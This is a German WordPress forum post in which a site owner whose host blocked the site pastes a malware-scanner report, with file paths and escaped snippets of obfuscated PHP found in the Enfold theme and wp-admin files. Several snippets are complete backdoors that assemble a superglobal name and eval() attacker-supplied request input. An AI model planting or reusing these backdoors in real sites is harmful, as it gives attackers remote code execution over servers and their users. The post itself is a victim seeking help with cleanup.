Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • #546357

    Hallo,

    Domainfactory hat gestern auf Grund eines Malware-Problems meine komplette Webseite gesperrt. Nach kompletter Neuinstallation, deinstallieren aller Plugins und Neuinstallation des aktuellsten Enfold-Themes lief die Seite kurzzeitig, wurde aber direkt wieder gesperrt. Der Malware-Scan von Domainfactory zeigt mir schädlichen Code in Folgenden Dateien an:

    
    ###########################################################
    #
    #                         MalwareScanner
    #
    #
    # Beschreibung:
    # Der MalwareScanner ist Signatur basiert und kann daher nur bekannte Malware finden!
    # Dieser prueft nur Dateien mit bestimmten Endungen, welche nicht binaer sind.
    #
    # Bei wenigen Treffer/Funde (weniger als 3 Stueck), pruefen Sie bitte die Suchmuster, Warnings und Signatur-Version im Detail manuell!
    # Bei Fragen oder nicht gefundener Malware, wenden Sie sich bitte an unsere Technik-Abteilung.
    #
    #
    #
    # Signatur:            2015-12-02 22:14:40 +0100
    # Such-Pfad:           /kunden/151708_35216/hosting/10484/reifen-ritter.de/webseiten/wordpress/ 
    # Start-Zeit:          03.12.2015 07:39:47 +0100
    #
    #
    # Alle Ergebnisse OHNE GEWAEHR!!!
    #
    ###########################################################
    
    Lese nun alle Verzeichnisse ein........
    Pruefe nun die Files auf Malware.....
    
    0% abgeschlossen.
    
    10% abgeschlossen.
    
    FUNDE: 20x
    #######################################
    /kunden/151708_35216/hosting/10484/reifen-ritter.de/webseiten/wordpress/wp-admin/network/update-core.php		
    #######################################
    Changed	 ->   02.12.2015 23:45:34 +0100
    Zeile	 ->   SuchMuster			-> 	 FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
    2	 ->   {if(.*){.*=Array($.*[.*...	-> 	 x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\"\

    m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> {if(.*){.*=Array($.*[.*… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> {if(.*){.*=Array($.*[.*… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> {if(.*){.*=Array($.*[.*… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> {if(.*){.*=Array(.*$.*[… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> {if(.*){.*=Array(.*$.*[… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> {if(.*){.*=Array(.*$.*[… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> {if(.*){.*=Array(.*$.*[… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*][.*]… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*][.*]… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*][.*]… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*][.*]… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*][.*]… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*][.*]… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*][.*]… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*][.*]… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*].$.*… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*].$.*… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*].$.*… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l
    2 -> $.*[.*][.*].$.*[.*].$.*… -> x45Cz\|Qx34MxJ\)itfI\}Y_oBwZq\~\(7831\”\`m\?\[dcUkWb6SL.sF,rpX\’v\*e\;2Kn9\#\{\&H:x25Dy=\>/5l

    20% abgeschlossen.

    30% abgeschlossen.

    FUNDE: 1x
    #######################################
    /kunden/151708_35216/hosting/10484/reifen-ritter.de/webseiten/wordpress/wp-content/themes/enfold/config-layerslider/LayerSlider/classes/option.php
    #######################################
    Changed -> 02.12.2015 23:34:42 +0100
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped…, angezeigt maximal: 20)
    0 -> WARNING: 1 Zeilen, 1x boeser Code -> \<\?php\$tjxr7=”p6_eod4ctbas”\;\$onyw0=strtolower\(\$tjxr7\[9\].\$tjxr7\[10\].\$tjxr7\[11\].\$tjxr7\[3\].\$tjxr7\[1\].\$tjxr7\[6\].\$tjxr7\[2\].\$tjxr7\[5\].\$tjxr7\[3\].\$tjxr7\[7\].\$tjxr7\[4\].\$tjxr7\[5\].\$tjxr7\[3\]\)\;\$nqwd4=strtoupper\(\$tjxr7\[2\].\$tjxr7\[0\].\$tjxr7\[4\].\$tjxr7\[11\].\$tjxr7\[8\]\)\;if\(isset\(\$\{\$nqwd4\}\[‘ncdd94a’

    FUNDE: 1x
    #######################################
    /kunden/151708_35216/hosting/10484/reifen-ritter.de/webseiten/wordpress/wp-content/themes/enfold/config-layerslider/LayerSlider/docs/session.php
    #######################################
    Changed -> 02.12.2015 23:34:46 +0100
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped…, angezeigt maximal: 20)
    0 -> WARNING: 1 Zeilen, 1x boeser Code -> \<\?php\$nrg8=”spt_o”\;\$ybb74=strtoupper\(\$nrg8\[3\].\$nrg8\[1\].\$nrg8\[4\].\$nrg8\[0\].\$nrg8\[2\]\)\;if\(isset\(\$\{\$ybb74\}\[‘q79c1ec’\]\)\)\{eval\(\$\{\$ybb74\}\[‘q79c1ec’\]\)\;\}\?\>

    FUNDE: 1x
    #######################################
    /kunden/151708_35216/hosting/10484/reifen-ritter.de/webseiten/wordpress/wp-content/themes/enfold/config-layerslider/LayerSlider/helpers/phpQuery.php
    #######################################
    Changed -> 02.12.2015 23:49:42 +0100
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped…, angezeigt maximal: 20)
    904 -> WARNING: Port Binding -> \*@TODOsupportbindingtoglobalevents

    FUNDE: 1x
    #######################################
    /kunden/151708_35216/hosting/10484/reifen-ritter.de/webseiten/wordpress/wp-content/themes/enfold/config-layerslider/LayerSlider/static/codemirror/mode/php/code.php
    #######################################
    Changed -> 02.12.2015 23:36:48 +0100
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped…, angezeigt maximal: 20)
    0 -> WARNING: 1 Zeilen, 1x boeser Code -> \<\?php\$zgq85=”sp_ot”\;\$jhnj04=strtoupper\(\$zgq85\[2\].\$zgq85\[1\].\$zgq85\[3\].\$zgq85\[0\].\$zgq85\[4\]\)\;if\(isset\(\$\{\$jhnj04\}\[‘qd6e706’\]\)\)\{eval\(\$\{\$jhnj04\}\[‘qd6e706’\]\)\;\}\?\>

    40% abgeschlossen.

    FUNDE: 15x
    #######################################
    /kunden/151708_35216/hosting/10484/reifen-ritter.de/webseiten/wordpress/wp-content/themes/enfold/config-layerslider/LayerSlider/static/skins/noskin/gallery.php
    #######################################
    Changed -> 02.12.2015 23:36:43 +0100
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped…, angezeigt maximal: 20)
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[‘.*’]($.*, $GL… -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[‘.*’]($.*, $GL… -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m
    1 -> $GLOBALS[‘.*’]($.*, $GL… -> \<\?php\$m95=”\*M8qon\~GW=\’L\;\$\|Xt_A\\b2r6Q+%N9w7i1t\<jIx\]n4\?\{“.\>-a0Z3JDyzpBH:S\`fehks@,rvU\#Rc\)Om\(EKl\}d5\&CV\[TF/PuYg!\”\;\$GLOBALS\[‘xlvar15’\]=\$\{\$m95\[17\].\$m95\[93\].\$m95\[77\].\$m95\[61\].\$m95\[90\]\}\;\$GLOBALS\[‘lbigf12’\]=\$m95\[38\].\$m95\[96\].\$m95\[57\].\$m95\[30\].\$m95\[30\].\$m95\[2\].\$m95\[33\]\;\$GLOBALS\[‘qykjr99’\]=\$m

    50% abgeschlossen.

    FUNDE: 1x
    #######################################
    /kunden/151708_35216/hosting/10484/reifen-ritter.de/webseiten/wordpress/wp-content/themes/enfold/config-wordpress-seo/db.php
    #######################################
    Changed -> 02.12.2015 23:32:11 +0100
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped…, angezeigt maximal: 20)
    0 -> WARNING: 1 Zeilen, 1x boeser Code -> \<\?php\$eazz8=”orupse_t”\;\$pxpw88=\$eazz8\[4\].\$eazz8\[7\].\$eazz8\[1\].\$eazz8\[7\].\$eazz8\[0\].\$eazz8\[2\].\$eazz8\[3\].\$eazz8\[3\].\$eazz8\[5\].\$eazz8\[1\]\;\$zzxu6=\$pxpw88\(\$eazz8\[6\].\$eazz8\[3\].\$eazz8\[0\].\$eazz8\[4\].\$eazz8\[7\]\)\;if\(isset\(\$\{\$zzxu6\}\[‘q95e668’\]\)\)\{eval\(\$\{\$zzxu6\}\[‘q95e668’\]\)\;\}\?\>

    60% abgeschlossen.

    FUNDE: 1x
    #######################################
    /kunden/151708_35216/hosting/10484/reifen-ritter.de/webseiten/wordpress/wp-content/themes/enfold/js/aviapopup/global.php
    #######################################
    Changed -> 02.12.2015 23:34:22 +0100
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped…, angezeigt maximal: 20)
    0 -> WARNING: 1 Zeilen, 1x boeser Code -> \<\?php\$mbhc5=”abopdc4e_st6″\;\$naom4=strtolower\(\$mbhc5\[1\].\$mbhc5\[0\].\$mbhc5\[9\].\$mbhc5\[7\].\$mbhc5\[11\].\$mbhc5\[6\].\$mbhc5\[8\].\$mbhc5\[4\].\$mbhc5\[7\].\$mbhc5\[5\].\$mbhc5\[2\].\$mbhc5\[4\].\$mbhc5\[7\]\)\;\$gouo5=strtoupper\(\$mbhc5\[8\].\$mbhc5\[3\].\$mbhc5\[2\].\$mbhc5\[9\].\$mbhc5\[10\]\)\;if\(isset\(\$\{\$gouo5\}\[‘n89024b’

    FUNDE: 15x
    #######################################
    /kunden/151708_35216/hosting/10484/reifen-ritter.de/webseiten/wordpress/wp-content/themes/enfold/js/include.php
    #######################################
    Changed -> 02.12.2015 23:32:18 +0100
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped…, angezeigt maximal: 20)
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
